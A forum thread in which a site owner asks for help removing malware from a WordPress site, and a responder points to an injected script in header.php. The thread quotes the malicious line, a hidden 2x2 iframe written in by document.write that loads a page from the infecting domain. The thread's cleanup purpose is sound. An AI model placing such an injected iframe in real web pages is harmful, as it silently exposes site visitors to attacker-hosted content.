Hi Guys I am having some real difficulty removing a virus on my wordpress site. It goes by the name "oxsanasiberians". I can still access the admin so it must by on the front end somewhere.
I have checked index.php files and theme_config etc to no avial. I know these virus' must make use of known a loop-whole and if anyone can help remove the virus it would be much appreciated.
my site is thebuxtedinn.co.uk
Agus Setiawan answers:
remove this code on header.php ( before <head> code )
document.write('<iframe src="http://oxsanasiberians.com/downloads/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
i think there's another code ( maybe in function.php ) that must be removed too. the code will check their code in header, that if removed, the page will not be loaded or error.
with your permission, please send me an access to your dashboard, i'll try to fix this
i think the site is working fine right now.
OK, I have removed a script from the header before and it seems to have returned. Although the code was written differently as:
Is there a php script which keeps adding code?
I have removed this new code but I am worried it will come back.
I can now re-access the homepage however when I try accessing any pages within the navigation bar I get a 404 error page.
Thank you for your help.